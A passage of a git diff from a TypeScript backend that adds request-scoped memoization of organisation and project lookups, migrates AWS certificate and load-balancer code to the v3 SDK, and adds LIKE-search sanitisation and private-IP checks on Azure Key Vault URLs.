"@app/lib/errors"; +import { requestMemoKeys } from 
"@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { ActorType } from "@app/services/auth/auth-type"; import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service"; import { TokenType } from "@app/services/auth-token/auth-token-types"; @@ -79,7 +81,9 @@ export const newOrgMembershipUserFactory = ({ }); } - const org = await orgDAL.findById(dto.permission.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(dto.permission.orgId), () => + orgDAL.findById(dto.permission.orgId) + ); if (org?.authEnforced) { throw new ForbiddenRequestError({ name: "InviteUser", @@ -122,7 +126,9 @@ export const newOrgMembershipUserFactory = ({ }; const signUpTokens: { email: string; link: string }[] = []; - const orgDetails = await orgDAL.findById(dto.permission.orgId); + const orgDetails = await requestMemoize(requestMemoKeys.orgFindById(dto.permission.orgId), () => + orgDAL.findById(dto.permission.orgId) + ); const serverCfg = await getServerCfg(); const isEmailLoginEnabled = !serverCfg.enabledLoginMethods || serverCfg.enabledLoginMethods.includes(LoginMethod.EMAIL); diff --git a/backend/src/services/membership-user/project/project-membership-user-factory.ts b/backend/src/services/membership-user/project/project-membership-user-factory.ts index 6c70d86f6ee..8d941cc3f45 100644 --- a/backend/src/services/membership-user/project/project-membership-user-factory.ts +++ b/backend/src/services/membership-user/project/project-membership-user-factory.ts @@ -13,6 +13,8 @@ import { } from "@app/ee/services/permission/project-permission"; import { getConfig } from "@app/lib/config/env"; import { BadRequestError, InternalServerError, NotFoundError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TOrgDALFactory } from 
"@app/services/org/org-dal"; import { TProjectDALFactory } from "@app/services/project/project-dal"; import { SmtpTemplates, TSmtpService } from "@app/services/smtp/smtp-service"; @@ -84,7 +86,10 @@ export const newProjectMembershipUserFactory = ({ throw new BadRequestError({ message: `Users ${missingUsers.join(",")} not part of organization` }); } - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.filter((el) => el.role !== ProjectMembershipRole.NoAccess).map((el) => el.role), scope.value @@ -136,7 +141,9 @@ export const newProjectMembershipUserFactory = ({ const appCfg = getConfig(); const scope = getScopeField(dto.scopeData); - const project = await projectDAL.findById(scope.value); + const project = await requestMemoize(requestMemoKeys.projectFindById(scope.value), () => + projectDAL.findById(scope.value) + ); const orgMembershipAcceptedUserIds = orgMembershipAccepted.map((el) => el.actorUserId as string); const emails = newMembers @@ -173,7 +180,10 @@ export const newProjectMembershipUserFactory = ({ throw new NotFoundError({ message: `User not found for project membership update` }); } - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const permissionRoles = await permissionService.getProjectPermissionByRoles( dto.data.roles.filter((el) => el.role !== ProjectMembershipRole.NoAccess).map((el) => el.role), scope.value diff --git a/backend/src/services/microsoft-teams/microsoft-teams-fns.ts b/backend/src/services/microsoft-teams/microsoft-teams-fns.ts index 
b9e92c72b3a..21a91c9b36e 100644 --- a/backend/src/services/microsoft-teams/microsoft-teams-fns.ts +++ b/backend/src/services/microsoft-teams/microsoft-teams-fns.ts @@ -1,10 +1,11 @@ /* eslint-disable class-methods-use-this */ -import axios from "axios"; +import { isAxiosError } from "axios"; import { TeamsActivityHandler, TurnContext } from "botbuilder"; import { Knex } from "knex"; import { z } from "zod"; import { getConfig } from "@app/lib/config/env"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; @@ -26,14 +27,14 @@ export const verifyTenantFromCode = async ( clientSecret: string ) => { const getAccessToken = async (params: URLSearchParams) => { - const response = await axios + const response = await request .post<{ access_token: string }>(`https://login.microsoftonline.com/${tenantId}/oauth2/v2.0/token`, params, { headers: { "Content-Type": "application/x-www-form-urlencoded" } }) .catch((err) => { - if (axios.isAxiosError(err)) { + if (isAxiosError(err)) { if ((err.response?.data as { error_description?: string })?.error_description?.includes(ConsentError)) { throw new BadRequestError({ message: "Unable to verify tenant, please ensure that you have granted admin consent." 
@@ -177,7 +178,7 @@ export const getMicrosoftTeamsAccessToken = async ( } } - const tokenResponse = await axios.post<{ access_token: string; expires_in: number }>( + const tokenResponse = await request.post<{ access_token: string; expires_in: number }>( details.uri, new URLSearchParams({ client_id: clientId, @@ -235,7 +236,7 @@ export const getMicrosoftTeamsAccessToken = async ( return tokenResponse.data.access_token; } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { logger.error( error.response?.data, `getMicrosoftTeamsAccessToken: Error fetching Microsoft Teams access token [status-code=${error.response?.status}]` @@ -306,7 +307,7 @@ export const isBotInstalledInTenant = async ( } as const; } - const appsResponse = await axios + const appsResponse = await request .get<{ value: { id: string; displayName: string; distributionMethod: string; externalId: string }[] }>( "https://graph.microsoft.com/v1.0/appCatalogs/teamsApps", { @@ -622,7 +623,7 @@ export class TeamsBot extends TeamsActivityHandler { } }; - await axios.post( + await request.post( `https://smba.trafficmanager.net/amer/v3/conversations/${channelId}/activities`, adaptiveCardActivity, { @@ -633,7 +634,7 @@ export class TeamsBot extends TeamsActivityHandler { } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { logger.error( error.response?.data, `sendMessageToChannel: Axios Error, Microsoft Teams Workflow Integration: Failed to send message to channel [channelId=${channelId}] [teamId=${teamId}] [tenantId=${tenantId}]` @@ -656,7 +657,7 @@ export class TeamsBot extends TeamsActivityHandler { while (teamsNextLink?.length) { try { // eslint-disable-next-line no-await-in-loop - const response = await axios.get<{ + const response = await request.get<{ value: { displayName: string; id: string }[]; "@odata.nextLink"?: string; }>(teamsNextLink, { @@ -678,7 +679,7 @@ export class TeamsBot extends TeamsActivityHandler { for await (const team of 
allTeams) { try { // Get installed apps for this team - const installedAppsResponse = await axios.get<{ value: { teamsAppDefinition: { teamsAppId: string } }[] }>( + const installedAppsResponse = await request.get<{ value: { teamsAppDefinition: { teamsAppId: string } }[] }>( `https://graph.microsoft.com/v1.0/teams/${team.id}/installedApps?$expand=teamsAppDefinition`, { headers: { @@ -702,7 +703,7 @@ export class TeamsBot extends TeamsActivityHandler { while (channelNextLink?.length) { // eslint-disable-next-line no-await-in-loop - const resp = await axios + const resp = await request .get<{ value: { displayName: string; id: string }[]; "@odata.nextLink"?: string; @@ -712,7 +713,7 @@ export class TeamsBot extends TeamsActivityHandler { } }) .catch((error) => { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { logger.error( error.response?.data, "getTeamsAndChannels: Axios error, Microsoft Teams Workflow Integration: Failed to fetch channels" diff --git a/backend/src/services/offline-usage-report/offline-usage-report-dal.ts b/backend/src/services/offline-usage-report/offline-usage-report-dal.ts index 109d90da838..5a86d3694a8 100644 --- a/backend/src/services/offline-usage-report/offline-usage-report-dal.ts +++ b/backend/src/services/offline-usage-report/offline-usage-report-dal.ts @@ -183,16 +183,14 @@ export const offlineUsageReportDALFactory = (db: TDbClient) => { const getSecretRotationMetrics = async () => { // Check both v1 and v2 secret rotation tables - const [v1RotationsResult, v2RotationsResult] = await Promise.all([ - db.from(TableName.SecretRotation).count("* as count").first() as Promise<{ count: string } | undefined>, - db.from(TableName.SecretRotationV2).count("* as count").first() as Promise<{ count: string } | undefined> - ]); + const v2RotationsResult = (await db.from(TableName.SecretRotationV2).count("* as count").first()) as + | { count: string } + | undefined; - const totalV1Rotations = parseInt(v1RotationsResult?.count || "0", 10); 
- const totalV2Rotations = parseInt(v2RotationsResult?.count || "0", 10); + const totalSecretRotations = parseInt(v2RotationsResult?.count || "0", 10); return { - totalSecretRotations: totalV1Rotations + totalV2Rotations + totalSecretRotations }; }; diff --git a/backend/src/services/org-admin/org-admin-service.ts b/backend/src/services/org-admin/org-admin-service.ts index a1a3561f915..d1d4cf285f0 100644 --- a/backend/src/services/org-admin/org-admin-service.ts +++ b/backend/src/services/org-admin/org-admin-service.ts @@ -60,7 +60,7 @@ export const orgAdminServiceFactory = ({ { orgId: actorOrgId, $search: { - name: search ? `%${search}%` : undefined + name: search || undefined } }, { offset, limit, sort: [["name", "asc"]], count: true } diff --git a/backend/src/services/org/org-dal.ts b/backend/src/services/org/org-dal.ts index 676d0a32c00..57f3ed15007 100644 --- a/backend/src/services/org/org-dal.ts +++ b/backend/src/services/org/org-dal.ts @@ -15,7 +15,7 @@ import { TUserEncryptionKeys } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; -import { groupBy, unique } from "@app/lib/fn"; +import { groupBy, sanitizeSqlLikeString, unique } from "@app/lib/fn"; import { buildFindFilter, ormify, @@ -53,7 +53,7 @@ export const orgDALFactory = (db: TDbClient) => { if (searchTerm) { void orgSubquery.where((qb) => { - void qb.whereILike(`${TableName.Organization}.name`, `%${searchTerm}%`); + void qb.whereILike(`${TableName.Organization}.name`, `%${sanitizeSqlLikeString(searchTerm)}%`); }); } @@ -219,7 +219,8 @@ export const orgDALFactory = (db: TDbClient) => { }; const baseQuery = buildBaseQuery(); - if (dto.search) void baseQuery.whereILike(`${TableName.Organization}.name`, `%${dto.search}%`); + if (dto.search) + void baseQuery.whereILike(`${TableName.Organization}.name`, `%${sanitizeSqlLikeString(dto.search)}%`); const [totalResult, orgs] = await Promise.all([ baseQuery.clone().count({ count: "*" }).first(), @@ -816,7 +817,13 @@ export const 
orgDALFactory = (db: TDbClient) => { tx?: Knex; }): Promise => { const list = await findEffectiveOrgMemberships(dto); - return list[0] ?? null; + const directMembership = list.find((membership) => + dto.actorType === ActorType.USER + ? membership.actorUserId === dto.actorId + : membership.actorIdentityId === dto.actorId + ); + + return directMembership ?? list[0] ?? null; }; const findMembershipWithScimFilter = async ( diff --git a/backend/src/services/org/org-service.ts b/backend/src/services/org/org-service.ts index c4cbde0a539..77bccafc0ca 100644 --- a/backend/src/services/org/org-service.ts +++ b/backend/src/services/org/org-service.ts @@ -33,6 +33,8 @@ import { delay as delayMs } from "@app/lib/delay"; import { BadRequestError, ForbiddenRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { QueueName } from "@app/queue"; import { getDefaultOrgMembershipRoleForUpdateOrg } from "@app/services/org/org-role-fns"; import { TOrgMembershipDALFactory } from "@app/services/org-membership/org-membership-dal"; @@ -177,7 +179,7 @@ export const orgServiceFactory = ({ const appCfg = getConfig(); const hasSubOrg = rootOrgId !== actorOrgId; - const org = await orgDAL.findOrgById(rootOrgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(rootOrgId), () => orgDAL.findOrgById(rootOrgId)); if (!org) throw new NotFoundError({ message: `Organization with ID '${rootOrgId}' not found` }); let subOrg; @@ -450,7 +452,9 @@ export const orgServiceFactory = ({ } const plan = await licenseService.getPlan(orgId); - const currentOrg = await orgDAL.findOrgById(actorOrgId); + const currentOrg = await requestMemoize(requestMemoKeys.orgFindOrgById(actorOrgId), () => + orgDAL.findOrgById(actorOrgId) + ); if 
(secretShareBrandConfig !== undefined) { if (!plan.secretShareExternalBranding) { @@ -889,7 +893,7 @@ export const orgServiceFactory = ({ const invitingUser = await userDAL.findOne({ id: actorId }); - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); const [inviteeOrgMembership] = await orgDAL.findMembership({ [`${TableName.Membership}.scopeOrgId` as "scopeOrgId"]: orgId, @@ -977,7 +981,7 @@ export const orgServiceFactory = ({ }); } - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); await tokenService.validateTokenForUser({ type: TokenType.TOKEN_EMAIL_ORG_INVITATION, @@ -1236,7 +1240,9 @@ export const orgServiceFactory = ({ invitedUsers.map(async (invitedUser) => { let org = orgCache[invitedUser.scopeOrgId]; if (!org) { - org = await orgDAL.findById(invitedUser.scopeOrgId); + org = await requestMemoize(requestMemoKeys.orgFindById(invitedUser.scopeOrgId), () => + orgDAL.findById(invitedUser.scopeOrgId) + ); orgCache[invitedUser.scopeOrgId] = org; } diff --git a/backend/src/services/pki-alert-v2/pki-alert-v2-service.ts b/backend/src/services/pki-alert-v2/pki-alert-v2-service.ts index c40684c6952..2339ce7d8a8 100644 --- a/backend/src/services/pki-alert-v2/pki-alert-v2-service.ts +++ b/backend/src/services/pki-alert-v2/pki-alert-v2-service.ts @@ -5,6 +5,8 @@ import { TPermissionServiceFactory } from "@app/ee/services/permission/permissio import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { blockLocalAndPrivateIpAddresses } from 
"@app/lib/validator/validate-url"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { KmsDataKey } from "@app/services/kms/kms-types"; @@ -729,7 +731,9 @@ export const pkiAlertV2ServiceFactory = ({ // Send in-app notifications to project admins try { const projectMembers = await projectMembershipDAL.findAllProjectMembers(projectId); - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (project) { const projectAdmins = projectMembers.filter((member) => diff --git a/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-fns.ts b/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-fns.ts index 742456630cf..212f63e5311 100644 --- a/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-fns.ts +++ b/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-fns.ts @@ -1,5 +1,20 @@ /* eslint-disable no-await-in-loop */ -import ACM from "aws-sdk/clients/acm.js"; +import { + ACMClient, + AddTagsToCertificateCommand, + type CertificateSummary, + DeleteCertificateCommand, + DescribeCertificateCommand, + GetCertificateCommand, + type GetCertificateCommandOutput, + ImportCertificateCommand, + type ImportCertificateCommandInput, + type KeyAlgorithm, + ListCertificatesCommand, + type ListCertificatesCommandInput, + ListTagsForCertificateCommand, + type Tag +} from "@aws-sdk/client-acm"; import RE2 from "re2"; import { z } from "zod"; @@ -85,11 +100,11 @@ const validateCertificateContent = (cert: string, privateKey: string): void => { } }; -const isAwsIssuedCertificate = (certificate: ACM.CertificateSummary): boolean => { +const isAwsIssuedCertificate = (certificate: CertificateSummary): boolean => { return certificate.Type === "AMAZON_ISSUED"; }; -const shouldSkipCertificateExport = (certificate: 
ACM.CertificateSummary): boolean => { +const shouldSkipCertificateExport = (certificate: CertificateSummary): boolean => { return isAwsIssuedCertificate(certificate); }; @@ -166,7 +181,7 @@ const getAwsAcmClient = async ( region: AWSRegion, appConnectionDAL: Pick, kmsService: Pick -): Promise => { +): Promise => { const appConnection = await appConnectionDAL.findById(connectionId); if (!appConnection) { @@ -212,7 +227,7 @@ const getAwsAcmClient = async ( const awsConfig = await getAwsConnectionConfig(awsConnectionConfig, region); - return new ACM(awsConfig); + return new ACMClient(awsConfig); }; export const awsCertificateManagerPkiSyncFactory = ({ @@ -222,14 +237,14 @@ export const awsCertificateManagerPkiSyncFactory = ({ certificateDAL }: TAwsCertificateManagerPkiSyncFactoryDeps) => { const deleteCertificateFromAcm = async ( - acm: ACM, + acm: ACMClient, certificateArn: string, operation: string, syncId: string, throwOnError = false ): Promise<{ arn: string; success: boolean; error?: Error }> => { try { - await withRateLimitRetry(() => acm.deleteCertificate({ CertificateArn: certificateArn }).promise(), { + await withRateLimitRetry(() => acm.send(new DeleteCertificateCommand({ CertificateArn: certificateArn })), { operation, syncId }); @@ -256,31 +271,40 @@ export const awsCertificateManagerPkiSyncFactory = ({ } }; const $getAwsAcmCertificates = async ( - acm: ACM, + acm: ACMClient, syncId = "unknown" ): Promise<{ acmCertificates: Record< string, - { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: ACM.TagList } + { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: Tag[] } >; }> => { const paginateAwsAcmCertificates = async () => { - const certificates: ACM.CertificateSummary[] = []; + const certificates: CertificateSummary[] = []; let nextToken: string | undefined; do { - const listParams: ACM.ListCertificatesRequest = { + // By default, listCertificates only returns RSA_1024 and RSA_2048 
certificates. + const keyTypes: KeyAlgorithm[] = [ + "RSA_1024", + "RSA_2048", + "RSA_3072", + "RSA_4096", + "EC_prime256v1", + "EC_secp384r1", + "EC_secp521r1" + ]; + const listParams: ListCertificatesCommandInput = { CertificateStatuses: ["ISSUED"], NextToken: nextToken, MaxItems: 100, - // By default, listCertificates only returns RSA_1024 and RSA_2048 certificates. // We must explicitly include all key types to get all certificates. Includes: { - keyTypes: ["RSA_1024", "RSA_2048", "RSA_3072", "RSA_4096", "EC_prime256v1", "EC_secp384r1", "EC_secp521r1"] + keyTypes } }; - const response = await withRateLimitRetry(() => acm.listCertificates(listParams).promise(), { + const response = await withRateLimitRetry(() => acm.send(new ListCertificatesCommand(listParams)), { operation: "list-certificates", syncId }); @@ -304,14 +328,16 @@ export const awsCertificateManagerPkiSyncFactory = ({ } const [certificateDetails, tagsResponse] = await Promise.all([ - acm.describeCertificate({ CertificateArn: certSummary.CertificateArn }).promise(), - acm.listTagsForCertificate({ CertificateArn: certSummary.CertificateArn }).promise() + acm.send(new DescribeCertificateCommand({ CertificateArn: certSummary.CertificateArn })), + acm.send(new ListTagsForCertificateCommand({ CertificateArn: certSummary.CertificateArn })) ]); - let certificateContent: ACM.GetCertificateResponse | undefined; + let certificateContent: GetCertificateCommandOutput | undefined; if (!shouldSkipCertificateExport(certSummary)) { try { - certificateContent = await acm.getCertificate({ CertificateArn: certSummary.CertificateArn }).promise(); + certificateContent = await acm.send( + new GetCertificateCommand({ CertificateArn: certSummary.CertificateArn }) + ); } catch (error) { // Certificate content cannot be imported } @@ -351,7 +377,7 @@ export const awsCertificateManagerPkiSyncFactory = ({ const res: Record< string, - { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: ACM.TagList 
} + { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: Tag[] } > = successfulCertificates.reduce( (obj, certificate) => ({ ...obj, @@ -363,10 +389,7 @@ export const awsCertificateManagerPkiSyncFactory = ({ Tags: certificate.Tags } }), - {} as Record< - string, - { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: ACM.TagList } - > + {} as Record ); return { @@ -391,7 +414,7 @@ export const awsCertificateManagerPkiSyncFactory = ({ }: { acmCertificates: Record< string, - { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: ACM.TagList } + { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: Tag[] } >; } = await $getAwsAcmCertificates(acm, pkiSync.id); @@ -568,9 +591,9 @@ export const awsCertificateManagerPkiSyncFactory = ({ setCertificates, async ({ key, name, cert, privateKey, certificateChain, existingArn, certificateId }) => { try { - const importParams: ACM.ImportCertificateRequest = { - Certificate: cert, - PrivateKey: privateKey + const importParams: ImportCertificateCommandInput = { + Certificate: Buffer.from(cert), + PrivateKey: Buffer.from(privateKey) }; if (!existingArn) { @@ -583,13 +606,13 @@ export const awsCertificateManagerPkiSyncFactory = ({ } if (certificateChain && certificateChain.trim().length > 0) { - importParams.CertificateChain = certificateChain; + importParams.CertificateChain = Buffer.from(certificateChain); } if (existingArn) { importParams.CertificateArn = existingArn; } - const response = await withRateLimitRetry(() => acm.importCertificate(importParams).promise(), { + const response = await withRateLimitRetry(() => acm.send(new ImportCertificateCommand(importParams)), { operation: "import-certificate", syncId: pkiSync.id }); @@ -603,8 +626,8 @@ export const awsCertificateManagerPkiSyncFactory = ({ await withRateLimitRetry( () => - acm - .addTagsToCertificate({ + acm.send( + new AddTagsToCertificateCommand({ 
CertificateArn: response.CertificateArn!, Tags: [ { @@ -613,7 +636,7 @@ export const awsCertificateManagerPkiSyncFactory = ({ } ] }) - .promise(), + ), { operation: "add-tags-to-certificate", syncId: pkiSync.id diff --git a/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-types.ts b/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-types.ts index b90915be3de..57c1519a825 100644 --- a/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-types.ts +++ b/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-types.ts @@ -1,4 +1,4 @@ -import ACM from "aws-sdk/clients/acm.js"; +import { type CertificateDetail, type Tag } from "@aws-sdk/client-acm"; import { z } from "zod"; import { TAwsConnection } from "@app/services/app-connection/aws/aws-connection-types"; @@ -22,8 +22,8 @@ export type TAwsCertificateManagerPkiSyncWithCredentials = TAwsCertificateManage connection: TAwsConnection; }; -export interface ACMCertificateWithKey extends ACM.CertificateDetail { - Tags?: ACM.TagList; +export interface ACMCertificateWithKey extends CertificateDetail { + Tags?: Tag[]; key: string; cert: string; certificateChain: string; diff --git a/backend/src/services/pki-sync/aws-elastic-load-balancer/aws-elastic-load-balancer-pki-sync-fns.ts b/backend/src/services/pki-sync/aws-elastic-load-balancer/aws-elastic-load-balancer-pki-sync-fns.ts index 40b49c92139..bffc522a225 100644 --- a/backend/src/services/pki-sync/aws-elastic-load-balancer/aws-elastic-load-balancer-pki-sync-fns.ts +++ b/backend/src/services/pki-sync/aws-elastic-load-balancer/aws-elastic-load-balancer-pki-sync-fns.ts @@ -1,6 +1,12 @@ /* eslint-disable no-await-in-loop */ -import ACM from "aws-sdk/clients/acm.js"; -import ELBv2 from "aws-sdk/clients/elbv2.js"; +import { ACMClient, DeleteCertificateCommand } from "@aws-sdk/client-acm"; +import { + AddListenerCertificatesCommand, + 
DescribeListenerCertificatesCommand, + ElasticLoadBalancingV2Client, + ModifyListenerCommand, + RemoveListenerCertificatesCommand +} from "@aws-sdk/client-elastic-load-balancing-v2"; import { z } from "zod"; import { TCertificateSyncs } from "@app/db/schemas"; @@ -70,7 +76,7 @@ const getAwsElbClient = async ( region: AWSRegion, appConnectionDAL: Pick, kmsService: Pick -): Promise => { +): Promise => { const appConnection = await appConnectionDAL.findById(connectionId); if (!appConnection) { @@ -116,7 +122,7 @@ const getAwsElbClient = async ( const awsConfig = await getAwsConnectionConfig(awsConnectionConfig, region); - return new ELBv2(awsConfig); + return new ElasticLoadBalancingV2Client(awsConfig); }; const getAwsAcmClient = async ( @@ -124,7 +130,7 @@ const getAwsAcmClient = async ( region: AWSRegion, appConnectionDAL: Pick, kmsService: Pick -): Promise => { +): Promise => { const appConnection = await appConnectionDAL.findById(connectionId); if (!appConnection) { @@ -170,7 +176,7 @@ const getAwsAcmClient = async ( const awsConfig = await getAwsConnectionConfig(awsConnectionConfig, region); - return new ACM(awsConfig); + return new ACMClient(awsConfig); }; export const awsElasticLoadBalancerPkiSyncFactory = ({ @@ -187,14 +193,14 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ }); const attachCertificateToListener = async ( - elbClient: ELBv2, + elbClient: ElasticLoadBalancingV2Client, listenerArn: string, certificateArn: string, setAsDefault: boolean, syncId: string ): Promise => { const listenerCertsResponse = await withRateLimitRetry( - () => elbClient.describeListenerCertificates({ ListenerArn: listenerArn }).promise(), + () => elbClient.send(new DescribeListenerCertificatesCommand({ ListenerArn: listenerArn })), { operation: "describe-listener-certificates", syncId } ); @@ -206,9 +212,12 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ if (!isAlreadyAttached) { await withRateLimitRetry( () => - elbClient - .addListenerCertificates({ 
ListenerArn: listenerArn, Certificates: [{ CertificateArn: certificateArn }] }) - .promise(), + elbClient.send( + new AddListenerCertificatesCommand({ + ListenerArn: listenerArn, + Certificates: [{ CertificateArn: certificateArn }] + }) + ), { operation: "add-listener-certificates", syncId } ); } @@ -216,25 +225,28 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ if (setAsDefault && !isAlreadyDefault) { await withRateLimitRetry( () => - elbClient - .modifyListener({ ListenerArn: listenerArn, Certificates: [{ CertificateArn: certificateArn }] }) - .promise(), + elbClient.send( + new ModifyListenerCommand({ ListenerArn: listenerArn, Certificates: [{ CertificateArn: certificateArn }] }) + ), { operation: "modify-listener", syncId } ); } }; const removeCertificateFromListener = async ( - elbClient: ELBv2, + elbClient: ElasticLoadBalancingV2Client, listenerArn: string, certificateArn: string, syncId: string ): Promise => { await withRateLimitRetry( () => - elbClient - .removeListenerCertificates({ ListenerArn: listenerArn, Certificates: [{ CertificateArn: certificateArn }] }) - .promise(), + elbClient.send( + new RemoveListenerCertificatesCommand({ + ListenerArn: listenerArn, + Certificates: [{ CertificateArn: certificateArn }] + }) + ), { operation: "remove-listener-certificates", syncId } ); }; @@ -354,7 +366,7 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ for (const listener of listeners) { try { const response = await withRateLimitRetry( - () => elbClient.describeListenerCertificates({ ListenerArn: listener.listenerArn }).promise(), + () => elbClient.send(new DescribeListenerCertificatesCommand({ ListenerArn: listener.listenerArn })), { operation: "describe-listener-certificates-for-cleanup", syncId: pkiSync.id } ); const defaultCert = response.Certificates?.find((c) => c.IsDefault); @@ -397,7 +409,7 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ // Remove from ACM try { await withRateLimitRetry( - () => acmClient.deleteCertificate({ 
CertificateArn: certificateArn }).promise(), + () => acmClient.send(new DeleteCertificateCommand({ CertificateArn: certificateArn })), { operation: "delete-orphaned-certificate", syncId: pkiSync.id @@ -492,10 +504,13 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ // Remove from ACM try { - await withRateLimitRetry(() => acmClient.deleteCertificate({ CertificateArn: certificateArn }).promise(), { - operation: "delete-certificate", - syncId: pkiSync.id - }); + await withRateLimitRetry( + () => acmClient.send(new DeleteCertificateCommand({ CertificateArn: certificateArn })), + { + operation: "delete-certificate", + syncId: pkiSync.id + } + ); await certificateSyncDAL.removeCertificates(pkiSync.id, [certificateId]); removedCount += 1; } catch (error) { diff --git a/backend/src/services/pki-sync/azure-key-vault/azure-key-vault-pki-sync-fns.ts b/backend/src/services/pki-sync/azure-key-vault/azure-key-vault-pki-sync-fns.ts index 390a08098cd..6b14475481d 100644 --- a/backend/src/services/pki-sync/azure-key-vault/azure-key-vault-pki-sync-fns.ts +++ b/backend/src/services/pki-sync/azure-key-vault/azure-key-vault-pki-sync-fns.ts @@ -5,6 +5,7 @@ import * as crypto from "crypto"; import { TCertificateSyncs } from "@app/db/schemas"; import { request } from "@app/lib/config/request"; import { logger } from "@app/lib/logger"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; import { getAzureConnectionAccessToken } from "@app/services/app-connection/azure-key-vault/azure-key-vault-connection-fns"; import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; @@ -211,6 +212,8 @@ export const azureKeyVaultPkiSyncFactory = ({ certificateDAL }: TAzureKeyVaultPkiSyncFactoryDeps) => { const $getAzureKeyVaultCertificates = async (accessToken: string, vaultBaseUrl: string, syncId = "unknown") => { + await 
blockLocalAndPrivateIpAddresses(vaultBaseUrl); + const paginateAzureKeyVaultCertificates = async () => { let result: GetAzureKeyVaultCertificate[] = []; @@ -218,6 +221,7 @@ export const azureKeyVaultPkiSyncFactory = ({ while (currentUrl) { const urlToFetch = currentUrl; // Capture current URL to avoid loop function issue + await blockLocalAndPrivateIpAddresses(urlToFetch); const res = await withRateLimitRetry( () => request.get<{ value: GetAzureKeyVaultCertificate[]; nextLink: string }>(urlToFetch, { @@ -248,14 +252,13 @@ export const azureKeyVaultPkiSyncFactory = ({ const certificateResults = await executeWithConcurrencyLimit( enabledAzureKeyVaultCertificates, async (getAzureKeyVaultCertificate) => { - const azureKeyVaultCertificate = await request.get( - `${getAzureKeyVaultCertificate.id}?api-version=7.4`, - { - headers: { - Authorization: `Bearer ${accessToken}` - } + const certificateDetailUrl = `${getAzureKeyVaultCertificate.id}?api-version=7.4`; + await blockLocalAndPrivateIpAddresses(certificateDetailUrl); + const azureKeyVaultCertificate = await request.get(certificateDetailUrl, { + headers: { + Authorization: `Bearer ${accessToken}` } - ); + }); let certPem = ""; if (azureKeyVaultCertificate.data.cer) { @@ -733,6 +736,8 @@ export const azureKeyVaultPkiSyncFactory = ({ // Cast destination config to Azure Key Vault config const destinationConfig = pkiSync.destinationConfig as TAzureKeyVaultPkiSyncConfig; + await blockLocalAndPrivateIpAddresses(destinationConfig.vaultBaseUrl); + const existingSyncRecords = await certificateSyncDAL.findByPkiSyncId(pkiSync.id); const certificateNamesToRemove: string[] = []; const certificateIdToNameMap = new Map(); diff --git a/backend/src/services/project-bot/project-bot-dal.ts b/backend/src/services/project-bot/project-bot-dal.ts index 2f1863ad6d3..be4dfce79bf 100644 --- a/backend/src/services/project-bot/project-bot-dal.ts +++ b/backend/src/services/project-bot/project-bot-dal.ts @@ -51,12 +51,12 @@ export const 
